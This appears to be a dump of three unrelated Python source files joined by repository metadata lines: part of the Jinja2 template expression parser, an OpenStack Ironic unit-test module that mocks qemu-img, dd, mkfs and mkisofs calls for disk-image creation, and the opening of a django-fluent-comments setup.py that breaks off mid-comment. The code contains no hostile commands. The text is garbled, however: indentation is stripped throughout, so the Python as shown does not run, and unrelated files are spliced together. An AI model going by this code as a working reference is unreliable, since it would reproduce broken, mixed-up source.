node.body = self.parse_statements(('name:endmacro',),
drop_needle=True)
return node
def parse_print(self):
node = nodes.Output(lineno=next(self.stream).lineno)
node.nodes = []
while self.stream.current.type != 'block_end':
if node.nodes:
self.stream.expect('comma')
node.nodes.append(self.parse_expression())
return node
def parse_assign_target(self, with_tuple=True, name_only=False,
extra_end_rules=None):
"""Parse an assignment target. As Jinja2 allows assignments to
tuples, this function can parse all allowed assignment targets. Per
default assignments to tuples are parsed, that can be disable however
by setting `with_tuple` to `False`. If only assignments to names are
wanted `name_only` can be set to `True`. The `extra_end_rules`
parameter is forwarded to the tuple parsing function.
"""
if name_only:
token = self.stream.expect('name')
target = nodes.Name(token.value, 'store', lineno=token.lineno)
else:
if with_tuple:
target = self.parse_tuple(simplified=True,
extra_end_rules=extra_end_rules)
else:
target = self.parse_primary(with_postfix=False)
target.set_ctx('store')
if not target.can_assign():
self.fail('can\'t assign to %r' % target.__class__.
__name__.lower(), target.lineno)
return target
def parse_expression(self, with_condexpr=True):
"""Parse an expression. Per default all expressions are parsed, if
the optional `with_condexpr` parameter is set to `False` conditional
expressions are not parsed.
"""
if with_condexpr:
return self.parse_condexpr()
return self.parse_or()
def parse_condexpr(self):
lineno = self.stream.current.lineno
expr1 = self.parse_or()
while self.stream.skip_if('name:if'):
expr2 = self.parse_or()
if self.stream.skip_if('name:else'):
expr3 = self.parse_condexpr()
else:
expr3 = None
expr1 = nodes.CondExpr(expr2, expr1, expr3, lineno=lineno)
lineno = self.stream.current.lineno
return expr1
def parse_or(self):
lineno = self.stream.current.lineno
left = self.parse_and()
while self.stream.skip_if('name:or'):
right = self.parse_and()
left = nodes.Or(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_and(self):
lineno = self.stream.current.lineno
left = self.parse_not()
while self.stream.skip_if('name:and'):
right = self.parse_not()
left = nodes.And(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_not(self):
if self.stream.current.test('name:not'):
lineno = next(self.stream).lineno
return nodes.Not(self.parse_not(), lineno=lineno)
return self.parse_compare()
def parse_compare(self):
lineno = self.stream.current.lineno
expr = self.parse_add()
ops = []
while 1:
token_type = self.stream.current.type
if token_type in _compare_operators:
next(self.stream)
ops.append(nodes.Operand(token_type, self.parse_add()))
elif self.stream.skip_if('name:in'):
ops.append(nodes.Operand('in', self.parse_add()))
elif self.stream.current.test('name:not') and \
self.stream.look().test('name:in'):
self.stream.skip(2)
ops.append(nodes.Operand('notin', self.parse_add()))
else:
break
lineno = self.stream.current.lineno
if not ops:
return expr
return nodes.Compare(expr, ops, lineno=lineno)
def parse_add(self):
lineno = self.stream.current.lineno
left = self.parse_sub()
while self.stream.current.type == 'add':
next(self.stream)
right = self.parse_sub()
left = nodes.Add(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_sub(self):
lineno = self.stream.current.lineno
left = self.parse_concat()
while self.stream.current.type == 'sub':
next(self.stream)
right = self.parse_concat()
left = nodes.Sub(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_concat(self):
lineno = self.stream.current.lineno
args = [self.parse_mul()]
while self.stream.current.type == 'tilde':
next(self.stream)
args.append(self.parse_mul())
if len(args) == 1:
return args[0]
return nodes.Concat(args, lineno=lineno)
def parse_mul(self):
lineno = self.stream.current.lineno
left = self.parse_div()
while self.stream.current.type == 'mul':
next(self.stream)
right = self.parse_div()
left = nodes.Mul(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_div(self):
lineno = self.stream.current.lineno
left = self.parse_floordiv()
while self.stream.current.type == 'div':
next(self.stream)
right = self.parse_floordiv()
left = nodes.Div(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_floordiv(self):
lineno = self.stream.current.lineno
left = self.parse_mod()
while self.stream.current.type == 'floordiv':
next(self.stream)
right = self.parse_mod()
left = nodes.FloorDiv(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_mod(self):
lineno = self.stream.current.lineno
left = self.parse_pow()
while self.stream.current.type == 'mod':
next(self.stream)
right = self.parse_pow()
left = nodes.Mod(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_pow(self):
lineno = self.stream.current.lineno
left = self.parse_unary()
while self.stream.current.type == 'pow':
next(self.stream)
right = self.parse_unary()
left = nodes.Pow(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_unary(self):
token_type = self.stream.current.type
lineno = self.stream.current.lineno
if token_type == 'sub':
next(self.stream)
node = self.parse_unary()
return nodes.Neg(node, lineno=lineno)
if token_type == 'add':
next(self.stream)
node = self.parse_unary()
return nodes.Pos(node, lineno=lineno)
return self.parse_primary()
def parse_primary(self, with_postfix=True):
token = self.stream.current
if token.type == 'name':
if token.value in ('true', 'false', 'True', 'False'):
node = nodes.Const(token.value in ('true', 'True'),
lineno=token.lineno)
elif token.value in ('none', 'None'):
node = nodes.Const(None, lineno=token.lineno)
else:
node = nodes.Name(token.value, 'load', lineno=token.lineno)
next(self.stream)
elif token.type == 'string':
next(self.stream)
buf = [token.value]
lineno = token.lineno
while self.stream.current.type == 'string':
buf.append(self.stream.current.value)
next(self.stream)
node = nodes.Const(''.join(buf), lineno=lineno)
elif token.type in ('integer', 'float'):
next(self.stream)
node = nodes.Const(token.value, lineno=token.lineno)
elif token.type == 'lparen':
next(self.stream)
node = self.parse_tuple(explicit_parentheses=True)
self.stream.expect('rparen')
elif token.type == 'lbracket':
node = self.parse_list()
elif token.type == 'lbrace':
node = self.parse_dict()
else:
self.fail("unexpected '%s'" % describe_token(token), token.lineno)
if with_postfix:
node = self.parse_postfix(node)
return node
def parse_tuple(self, simplified=False, with_condexpr=True,
extra_end_rules=None, explicit_parentheses=False):
"""Works like `parse_expression` but if multiple expressions are
delimited by a comma a :class:`~jinja2.nodes.Tuple` node is created.
        This method could also return a plain expression instead of a tuple
        if no commas were found.
The default parsing mode is a full tuple. If `simplified` is `True`
only names and literals are parsed. The `no_condexpr` parameter is
forwarded to :meth:`parse_expression`.
        Because tuples do not require delimiters and may end in a bogus comma,
        an extra hint is needed that marks the end of a tuple. For example
for loops support tuples between `for` and `in`. In that case the
`extra_end_rules` is set to ``['name:in']``.
`explicit_parentheses` is true if the parsing was triggered by an
expression in parentheses. This is used to figure out if an empty
tuple is a valid expression or not.
"""
lineno = self.stream.current.lineno
if simplified:
parse = lambda: self.parse_primary(with_postfix=False)
elif with_condexpr:
parse = self.parse_expression
else:
parse = lambda: self.parse_expression(with_condexpr=False)
args = []
is_tuple = False
while 1:
if args:
self.stream.expect('comma')
if self.is_tuple_end(extra_end_rules):
break
args.append(parse())
if self.stream.current.type == 'comma':
is_tuple = True
else:
break
lineno = self.stream.current.lineno
if not is_tuple:
if args:
return args[0]
# if we don't have explicit parentheses, an empty tuple is
# not a valid expression. This would mean nothing (literally
# nothing) in the spot of an expression would be an empty
# tuple.
if not explicit_parentheses:
self.fail('Expected an expression, got \'%s\'' %
describe_token(self.stream.current))
return nodes.Tuple(args, 'load', lineno=lineno)
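    # Examples (illustrative): ``1, 2`` parses to Tuple([Const(1), Const(2)]),
    # a bare ``1`` comes back as the plain Const(1) rather than a one-tuple,
    # and ``()`` is only accepted when explicit_parentheses is true.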
def parse_list(self):
token = self.stream.expect('lbracket')
items = []
while self.stream.current.type != 'rbracket':
if items:
self.stream.expect('comma')
if self.stream.current.type == 'rbracket':
break
items.append(self.parse_expression())
self.stream.expect('rbracket')
return nodes.List(items, lineno=token.lineno)
def parse_dict(self):
token = self.stream.expect('lbrace')
items = []
while self.stream.current.type != 'rbrace':
if items:
self.stream.expect('comma')
if self.stream.current.type == 'rbrace':
break
key = self.parse_expression()
self.stream.expect('colon')
value = self.parse_expression()
items.append(nodes.Pair(key, value, lineno=key.lineno))
self.stream.expect('rbrace')
return nodes.Dict(items, lineno=token.lineno)
def parse_postfix(self, node):
while 1:
token_type = self.stream.current.type
if token_type == 'dot' or token_type == 'lbracket':
node = self.parse_subscript(node)
elif token_type == 'lparen':
node = self.parse_call(node)
elif token_type == 'pipe':
node = self.parse_filter(node)
elif token_type == 'name' and self.stream.current.value == 'is':
node = self.parse_test(node)
else:
break
return node
def parse_subscript(self, node):
token = next(self.stream)
if token.type == 'dot':
attr_token = self.stream.current
next(self.stream)
if attr_token.type == 'name':
return nodes.Getattr(node, attr_token.value, 'load',
lineno=token.lineno)
elif attr_token.type != 'integer':
self.fail('expected name or number', attr_token.lineno)
arg = nodes.Const(attr_token.value, lineno=attr_token.lineno)
return nodes.Getitem(node, arg, 'load', lineno=token.lineno)
if token.type == 'lbracket':
priority_on_attribute = False
args = []
while self.stream.current.type != 'rbracket':
if args:
self.stream.expect('comma')
args.append(self.parse_subscribed())
self.stream.expect('rbracket')
if len(args) == 1:
arg = args[0]
else:
arg = nodes.Tuple(args, 'load', lineno=token.lineno)
return nodes.Getitem(node, arg, 'load', lineno=token.lineno)
        self.fail('expected subscript expression', token.lineno)
def parse_subscribed(self):
lineno = self.stream.current.lineno
if self.stream.current.type == 'colon':
next(self.stream)
args = [None]
else:
node = self.parse_expression()
if self.stream.current.type != 'colon':
return node
next(self.stream)
args = [node]
if self.stream.current.type == 'colon':
args.append(None)
elif self.stream.current.type not in ('rbracket', 'comma'):
args.append(self.parse_expression())
else:
args.append(None)
if self.stream.current.type == 'colon':
next(self.stream)
if self.stream.current.type not in ('rbracket', 'comma'):
args.append(self.parse_expression())
else:
args.append(None)
else:
args.append(None)
return nodes.Slice(lineno=lineno, *args)
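    # Examples (illustrative): ``foo[1]`` returns the bare Const(1) (no
    # Slice), ``foo[1:]`` yields Slice(Const(1), None, None), and
    # ``foo[::2]`` yields Slice(None, None, Const(2)).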
def parse_call(self, node):
token = self.stream.expect('lparen')
args = []
kwargs = []
dyn_args = dyn_kwargs = None
require_comma = False
def ensure(expr):
if not expr:
self.fail('invalid syntax for function call expression',
token.lineno)
while self.stream.current.type != 'rparen':
if require_comma:
self.stream.expect('comma')
# support for trailing comma
if self.stream.current.type == 'rparen':
break
if self.stream.current.type == 'mul':
ensure(dyn_args is None and dyn_kwargs is None)
next(self.stream)
dyn_args = self.parse_expression()
elif self.stream.current.type == 'pow':
ensure(dyn_kwargs is None)
next(self.stream)
dyn_kwargs = self.parse_expression()
else:
ensure(dyn_args is None and dyn_kwargs is None)
if self.stream.current.type == 'name' and \
self.stream.look().type == 'assign':
key = self.stream.current.value
self.stream.skip(2)
value = self.parse_expression()
kwargs.append(nodes.Keyword(key, value,
lineno=value.lineno))
else:
ensure(not kwargs)
args.append(self.parse_expression())
require_comma = True
self.stream.expect('rparen')
if node is None:
return args, kwargs, dyn_args, dyn_kwargs
return nodes.Call(node, args, kwargs, dyn_args, dyn_kwargs,
lineno=token.lineno)
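    # Example (illustrative): ``foo(1, x=2, *rest)`` yields args=[Const(1)],
    # kwargs=[Keyword('x', Const(2))] and dyn_args=Name('rest'); passing
    # node=None (as parse_filter and parse_test do) returns the raw
    # (args, kwargs, dyn_args, dyn_kwargs) tuple instead of a Call node.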
def parse_filter(self, node, start_inline=False):
while self.stream.current.type == 'pipe' or start_inline:
if not start_inline:
next(self.stream)
token = self.stream.expect('name')
name = token.value
while self.stream.current.type == 'dot':
next(self.stream)
name += '.' + self.stream.expect('name').value
if self.stream.current.type == 'lparen':
args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None)
else:
args = []
kwargs = []
dyn_args = dyn_kwargs = None
node = nodes.Filter(node, name, args, kwargs, dyn_args,
dyn_kwargs, lineno=token.lineno)
start_inline = False
return node
def parse_test(self, node):
token = next(self.stream)
if self.stream.current.test('name:not'):
next(self.stream)
negated = True
else:
negated = False
name = self.stream.expect('name').value
while self.stream.current.type == 'dot':
next(self.stream)
name += '.' + self.stream.expect('name').value
dyn_args = dyn_kwargs = None
kwargs = []
if self.stream.current.type == 'lparen':
args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None)
elif self.stream.current.type in ('name', 'string', 'integer',
'float', 'lparen', 'lbracket',
'lbrace') and not \
self.stream.current.test_any('name:else', 'name:or',
'name:and'):
if self.stream.current.test('name:is'):
self.fail('You cannot chain multiple tests with is')
args = [self.parse_expression()]
else:
args = []
node = nodes.Test(node, name, args, kwargs, dyn_args,
dyn_kwargs, lineno=token.lineno)
if negated:
node = nodes.Not(node, lineno=token.lineno)
return node
def subparse(self, end_tokens=None):
body = []
data_buffer = []
add_data = data_buffer.append
if end_tokens is not None:
self._end_token_stack.append(end_tokens)
def flush_data():
if data_buffer:
lineno = data_buffer[0].lineno
body.append(nodes.Output(data_buffer[:], lineno=lineno))
del data_buffer[:]
try:
while self.stream:
token = self.stream.current
if token.type == 'data':
if token.value:
add_data(nodes.TemplateData(token.value,
lineno=token.lineno))
next(self.stream)
elif token.type == 'variable_begin':
next(self.stream)
add_data(self.parse_tuple(with_condexpr=True))
self.stream.expect('variable_end')
elif token.type == 'block_begin':
flush_data()
next(self.stream)
if end_tokens is not None and \
self.stream.current.test_any(*end_tokens):
return body
rv = self.parse_statement()
if isinstance(rv, list):
body.extend(rv)
else:
body.append(rv)
self.stream.expect('block_end')
else:
raise AssertionError('internal parsing error')
flush_data()
finally:
if end_tokens is not None:
self._end_token_stack.pop()
return body
def parse(self):
"""Parse the whole template into a `Template` node."""
result = nodes.Template(self.subparse(), lineno=1)
result.set_environment(self.environment)
return result
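def _example_parse(source):
    # Illustrative sketch only, not part of the original module: templates
    # are normally parsed through Environment.parse(), which constructs a
    # Parser much like this and returns the resulting Template node.
    from jinja2.environment import Environment  # local import avoids a cycle
    return Parser(Environment(), source).parse()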
| apache-2.0 |
Tehsmash/ironic | ironic/tests/test_images.py | 1 | 20411 | # Vim: tabstop=4 shiftwidth=4 softtabstop=4
# coding=utf-8
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import shutil
import mock
from oslo.concurrency import processutils
from oslo.config import cfg
import six.moves.builtins as __builtin__
from ironic.common import exception
from ironic.common import image_service
from ironic.common import images
from ironic.common import utils
from ironic.openstack.common import imageutils
from ironic.tests import base
CONF = cfg.CONF
class IronicImagesTestCase(base.TestCase):
class FakeImgInfo(object):
pass
@mock.patch.object(imageutils, 'QemuImgInfo')
@mock.patch.object(os.path, 'exists', return_value=False)
def test_qemu_img_info_path_doesnt_exist(self, path_exists_mock,
qemu_img_info_mock):
images.qemu_img_info('noimg')
path_exists_mock.assert_called_once_with('noimg')
qemu_img_info_mock.assert_called_once_with()
@mock.patch.object(utils, 'execute', return_value=('out', 'err'))
@mock.patch.object(imageutils, 'QemuImgInfo')
@mock.patch.object(os.path, 'exists', return_value=True)
def test_qemu_img_info_path_exists(self, path_exists_mock,
qemu_img_info_mock, execute_mock):
images.qemu_img_info('img')
path_exists_mock.assert_called_once_with('img')
execute_mock.assert_called_once_with('env', 'LC_ALL=C', 'LANG=C',
'qemu-img', 'info', 'img')
qemu_img_info_mock.assert_called_once_with('out')
@mock.patch.object(utils, 'execute')
def test_convert_image(self, execute_mock):
images.convert_image('source', 'dest', 'out_format')
execute_mock.assert_called_once_with('qemu-img', 'convert', '-O',
'out_format', 'source', 'dest',
run_as_root=False)
@mock.patch.object(image_service, 'Service')
@mock.patch.object(__builtin__, 'open')
def test_fetch_no_image_service(self, open_mock, image_service_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'file'
open_mock.return_value = mock_file_handle
images.fetch('context', 'image_href', 'path')
open_mock.assert_called_once_with('path', 'wb')
image_service_mock.assert_called_once_with(version=1,
context='context')
image_service_mock.return_value.download.assert_called_once_with(
'image_href', 'file')
@mock.patch.object(__builtin__, 'open')
def test_fetch_image_service(self, open_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'file'
open_mock.return_value = mock_file_handle
image_service_mock = mock.Mock()
images.fetch('context', 'image_href', 'path', image_service_mock)
open_mock.assert_called_once_with('path', 'wb')
image_service_mock.download.assert_called_once_with(
'image_href', 'file')
@mock.patch.object(images, 'image_to_raw')
@mock.patch.object(__builtin__, 'open')
def test_fetch_image_service_force_raw(self, open_mock, image_to_raw_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'file'
open_mock.return_value = mock_file_handle
image_service_mock = mock.Mock()
images.fetch('context', 'image_href', 'path', image_service_mock,
force_raw=True)
open_mock.assert_called_once_with('path', 'wb')
image_service_mock.download.assert_called_once_with(
'image_href', 'file')
image_to_raw_mock.assert_called_once_with(
'image_href', 'path', 'path.part')
@mock.patch.object(images, 'qemu_img_info')
def test_image_to_raw_no_file_format(self, qemu_img_info_mock):
info = self.FakeImgInfo()
info.file_format = None
qemu_img_info_mock.return_value = info
e = self.assertRaises(exception.ImageUnacceptable, images.image_to_raw,
'image_href', 'path', 'path_tmp')
qemu_img_info_mock.assert_called_once_with('path_tmp')
self.assertIn("'qemu-img info' parsing failed.", str(e))
@mock.patch.object(images, 'qemu_img_info')
def test_image_to_raw_backing_file_present(self, qemu_img_info_mock):
info = self.FakeImgInfo()
info.file_format = 'raw'
info.backing_file = 'backing_file'
qemu_img_info_mock.return_value = info
e = self.assertRaises(exception.ImageUnacceptable, images.image_to_raw,
'image_href', 'path', 'path_tmp')
qemu_img_info_mock.assert_called_once_with('path_tmp')
self.assertIn("fmt=raw backed by: backing_file", str(e))
@mock.patch.object(os, 'rename')
@mock.patch.object(os, 'unlink')
@mock.patch.object(images, 'convert_image')
@mock.patch.object(images, 'qemu_img_info')
def test_image_to_raw(self, qemu_img_info_mock, convert_image_mock,
unlink_mock, rename_mock):
CONF.set_override('force_raw_images', True)
info = self.FakeImgInfo()
info.file_format = 'fmt'
info.backing_file = None
qemu_img_info_mock.return_value = info
def convert_side_effect(source, dest, out_format):
info.file_format = 'raw'
convert_image_mock.side_effect = convert_side_effect
images.image_to_raw('image_href', 'path', 'path_tmp')
qemu_img_info_mock.assert_has_calls([mock.call('path_tmp'),
mock.call('path.converted')])
convert_image_mock.assert_called_once_with('path_tmp',
'path.converted', 'raw')
unlink_mock.assert_called_once_with('path_tmp')
rename_mock.assert_called_once_with('path.converted', 'path')
@mock.patch.object(os, 'unlink')
@mock.patch.object(images, 'convert_image')
@mock.patch.object(images, 'qemu_img_info')
def test_image_to_raw_not_raw_after_conversion(self, qemu_img_info_mock,
convert_image_mock,
unlink_mock):
CONF.set_override('force_raw_images', True)
info = self.FakeImgInfo()
info.file_format = 'fmt'
info.backing_file = None
qemu_img_info_mock.return_value = info
self.assertRaises(exception.ImageConvertFailed, images.image_to_raw,
'image_href', 'path', 'path_tmp')
qemu_img_info_mock.assert_has_calls([mock.call('path_tmp'),
mock.call('path.converted')])
convert_image_mock.assert_called_once_with('path_tmp',
'path.converted', 'raw')
unlink_mock.assert_called_once_with('path_tmp')
@mock.patch.object(os, 'rename')
@mock.patch.object(images, 'qemu_img_info')
def test_image_to_raw_already_raw_format(self, qemu_img_info_mock,
rename_mock):
info = self.FakeImgInfo()
info.file_format = 'raw'
info.backing_file = None
qemu_img_info_mock.return_value = info
images.image_to_raw('image_href', 'path', 'path_tmp')
qemu_img_info_mock.assert_called_once_with('path_tmp')
rename_mock.assert_called_once_with('path_tmp', 'path')
@mock.patch.object(image_service, 'Service')
def test_download_size_no_image_service(self, image_service_mock):
images.download_size('context', 'image_href')
image_service_mock.assert_called_once_with(version=1,
context='context')
image_service_mock.return_value.show.assert_called_once_with(
'image_href')
def test_download_size_image_service(self):
image_service_mock = mock.MagicMock()
images.download_size('context', 'image_href', image_service_mock)
image_service_mock.show.assert_called_once_with('image_href')
@mock.patch.object(images, 'qemu_img_info')
def test_converted_size(self, qemu_img_info_mock):
info = self.FakeImgInfo()
info.virtual_size = 1
qemu_img_info_mock.return_value = info
size = images.converted_size('path')
qemu_img_info_mock.assert_called_once_with('path')
self.assertEqual(1, size)
class FsImageTestCase(base.TestCase):
@mock.patch.object(shutil, 'copyfile')
@mock.patch.object(os, 'makedirs')
@mock.patch.object(os.path, 'dirname')
@mock.patch.object(os.path, 'exists')
def test__create_root_fs(self, path_exists_mock,
dirname_mock, mkdir_mock, cp_mock):
path_exists_mock_func = lambda path: path == 'root_dir'
files_info = {
'a1': 'b1',
'a2': 'b2',
'a3': 'sub_dir/b3'}
path_exists_mock.side_effect = path_exists_mock_func
dirname_mock.side_effect = ['root_dir', 'root_dir',
'root_dir/sub_dir', 'root_dir/sub_dir']
images._create_root_fs('root_dir', files_info)
cp_mock.assert_any_call('a1', 'root_dir/b1')
cp_mock.assert_any_call('a2', 'root_dir/b2')
cp_mock.assert_any_call('a3', 'root_dir/sub_dir/b3')
path_exists_mock.assert_any_call('root_dir/sub_dir')
dirname_mock.assert_any_call('root_dir/b1')
dirname_mock.assert_any_call('root_dir/b2')
dirname_mock.assert_any_call('root_dir/sub_dir/b3')
mkdir_mock.assert_called_once_with('root_dir/sub_dir')
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'write_to_file')
@mock.patch.object(utils, 'dd')
@mock.patch.object(utils, 'umount')
@mock.patch.object(utils, 'mount')
@mock.patch.object(utils, 'mkfs')
def test_create_vfat_image(self, mkfs_mock, mount_mock, umount_mock,
dd_mock, write_mock, tempdir_mock, create_root_fs_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tempdir'
tempdir_mock.return_value = mock_file_handle
parameters = {'p1': 'v1'}
files_info = {'a': 'b'}
images.create_vfat_image('tgt_file', parameters=parameters,
files_info=files_info, parameters_file='qwe',
fs_size_kib=1000)
dd_mock.assert_called_once_with('/dev/zero',
'tgt_file',
'count=1',
'bs=1000KiB')
mkfs_mock.assert_called_once_with('vfat', 'tgt_file')
mount_mock.assert_called_once_with('tgt_file', 'tempdir',
'-o', 'umask=0')
parameters_file_path = os.path.join('tempdir', 'qwe')
write_mock.assert_called_once_with(parameters_file_path, 'p1=v1')
create_root_fs_mock.assert_called_once_with('tempdir', files_info)
umount_mock.assert_called_once_with('tempdir')
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'dd')
@mock.patch.object(utils, 'umount')
@mock.patch.object(utils, 'mount')
@mock.patch.object(utils, 'mkfs')
def test_create_vfat_image_always_umount(self, mkfs_mock, mount_mock,
umount_mock, dd_mock, tempdir_mock, create_root_fs_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tempdir'
tempdir_mock.return_value = mock_file_handle
files_info = {'a': 'b'}
create_root_fs_mock.side_effect = OSError()
self.assertRaises(exception.ImageCreationFailed,
images.create_vfat_image, 'tgt_file',
files_info=files_info)
umount_mock.assert_called_once_with('tempdir')
@mock.patch.object(utils, 'dd')
def test_create_vfat_image_dd_fails(self, dd_mock):
dd_mock.side_effect = processutils.ProcessExecutionError
self.assertRaises(exception.ImageCreationFailed,
images.create_vfat_image, 'tgt_file')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'dd')
@mock.patch.object(utils, 'mkfs')
def test_create_vfat_image_mkfs_fails(self, mkfs_mock, dd_mock,
tempdir_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tempdir'
tempdir_mock.return_value = mock_file_handle
mkfs_mock.side_effect = processutils.ProcessExecutionError
self.assertRaises(exception.ImageCreationFailed,
images.create_vfat_image, 'tgt_file')
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'dd')
@mock.patch.object(utils, 'umount')
@mock.patch.object(utils, 'mount')
@mock.patch.object(utils, 'mkfs')
def test_create_vfat_image_umount_fails(self, mkfs_mock, mount_mock,
umount_mock, dd_mock, tempdir_mock, create_root_fs_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tempdir'
tempdir_mock.return_value = mock_file_handle
umount_mock.side_effect = processutils.ProcessExecutionError
self.assertRaises(exception.ImageCreationFailed,
images.create_vfat_image, 'tgt_file')
def test__generate_isolinux_cfg(self):
kernel_params = ['key1=value1', 'key2']
expected_cfg = ("default boot\n"
"\n"
"label boot\n"
"kernel /vmlinuz\n"
"append initrd=/initrd text key1=value1 key2 --")
cfg = images._generate_isolinux_cfg(kernel_params)
self.assertEqual(expected_cfg, cfg)
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'write_to_file')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'execute')
@mock.patch.object(images, '_generate_isolinux_cfg')
def test_create_isolinux_image(self, gen_cfg_mock, utils_mock,
tempdir_mock, write_to_file_mock,
create_root_fs_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tmpdir'
tempdir_mock.return_value = mock_file_handle
cfg = "cfg"
cfg_file = 'tmpdir/isolinux/isolinux.cfg'
gen_cfg_mock.return_value = cfg
params = ['a=b', 'c']
images.create_isolinux_image('tgt_file', 'path/to/kernel',
'path/to/ramdisk', kernel_params=params)
files_info = {
'path/to/kernel': 'vmlinuz',
'path/to/ramdisk': 'initrd',
CONF.isolinux_bin: 'isolinux/isolinux.bin'
}
create_root_fs_mock.assert_called_once_with('tmpdir', files_info)
gen_cfg_mock.assert_called_once_with(params)
write_to_file_mock.assert_called_once_with(cfg_file, cfg)
utils_mock.assert_called_once_with('mkisofs', '-r', '-V',
"BOOT IMAGE", '-cache-inodes', '-J', '-l',
'-no-emul-boot', '-boot-load-size',
'4', '-boot-info-table', '-b', 'isolinux/isolinux.bin',
'-o', 'tgt_file', 'tmpdir')
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'execute')
def test_create_isolinux_image_rootfs_fails(self, utils_mock,
tempdir_mock,
create_root_fs_mock):
create_root_fs_mock.side_effect = IOError
self.assertRaises(exception.ImageCreationFailed,
images.create_isolinux_image,
'tgt_file', 'path/to/kernel',
'path/to/ramdisk')
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'write_to_file')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'execute')
@mock.patch.object(images, '_generate_isolinux_cfg')
def test_create_isolinux_image_mkisofs_fails(self, gen_cfg_mock,
utils_mock,
tempdir_mock,
write_to_file_mock,
create_root_fs_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tmpdir'
tempdir_mock.return_value = mock_file_handle
utils_mock.side_effect = processutils.ProcessExecutionError
self.assertRaises(exception.ImageCreationFailed,
images.create_isolinux_image,
'tgt_file', 'path/to/kernel',
'path/to/ramdisk')
@mock.patch.object(images, 'create_isolinux_image')
@mock.patch.object(images, 'fetch')
@mock.patch.object(utils, 'tempdir')
def test_create_boot_iso(self, tempdir_mock, fetch_images_mock,
create_isolinux_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tmpdir'
tempdir_mock.return_value = mock_file_handle
images.create_boot_iso('ctx', 'output_file', 'kernel-uuid',
'ramdisk-uuid', 'root-uuid', 'kernel-params')
fetch_images_mock.assert_any_call('ctx', 'kernel-uuid',
'tmpdir/kernel-uuid', True)
fetch_images_mock.assert_any_call('ctx', 'ramdisk-uuid',
'tmpdir/ramdisk-uuid', True)
params = ['root=UUID=root-uuid', 'kernel-params']
create_isolinux_mock.assert_called_once_with('output_file',
'tmpdir/kernel-uuid', 'tmpdir/ramdisk-uuid', params)
@mock.patch.object(image_service, 'Service')
def test_get_glance_image_property(self, image_service_mock):
prop_dict = {'properties': {'prop1': 'val1'}}
image_service_obj_mock = image_service_mock.return_value
image_service_obj_mock.show.return_value = prop_dict
ret_val = images.get_glance_image_property('con', 'uuid', 'prop1')
image_service_mock.assert_called_once_with(version=1, context='con')
image_service_obj_mock.show.assert_called_once_with('uuid')
self.assertEqual('val1', ret_val)
ret_val = images.get_glance_image_property('con', 'uuid', 'prop2')
self.assertIsNone(ret_val)
@mock.patch.object(image_service, 'Service')
def test_get_temp_url_for_glance_image(self, image_service_mock):
direct_url = 'swift+http://host/v1/AUTH_xx/con/obj'
image_info = {'id': 'qwe', 'properties': {'direct_url': direct_url}}
glance_service_mock = image_service_mock.return_value
glance_service_mock.swift_temp_url.return_value = 'temp-url'
glance_service_mock.show.return_value = image_info
temp_url = images.get_temp_url_for_glance_image('context',
'glance_uuid')
glance_service_mock.show.assert_called_once_with('glance_uuid')
self.assertEqual('temp-url', temp_url)
| apache-2.0 |
mgpyh/django-fluent-comments | setup.py | 1 | 2800 | #!/usr/bin/env python
from __future__ import print_function
from setuptools import setup, find_packages
from os import path
import codecs
import os
import re
import sys
# When creating the sdist, make sure the django.mo file also exists:
if 'sdist' in sys.argv or 'develop' in sys.argv:
try:
os.chdir('fluent_comments')
# from django.core.management.commands.compilemessages import Command
# Command.compile_messages(sys.stderr)
finally:
os.chdir('..')
def read(*parts):
file_path = path.join(path.dirname(__file__), *parts)
return codecs.open(file_path, encoding='utf-8').read()
def find_version(*parts):
version_file = read(*parts)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", version_file, re.M)
if version_match:
return str(version_match.group(1))
raise RuntimeError("Unable to find version string.")
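# Illustrative note (not part of the build): find_version() extracts the quoted
# version from a line like  __version__ = '1.2.3'  in the named file, e.g.
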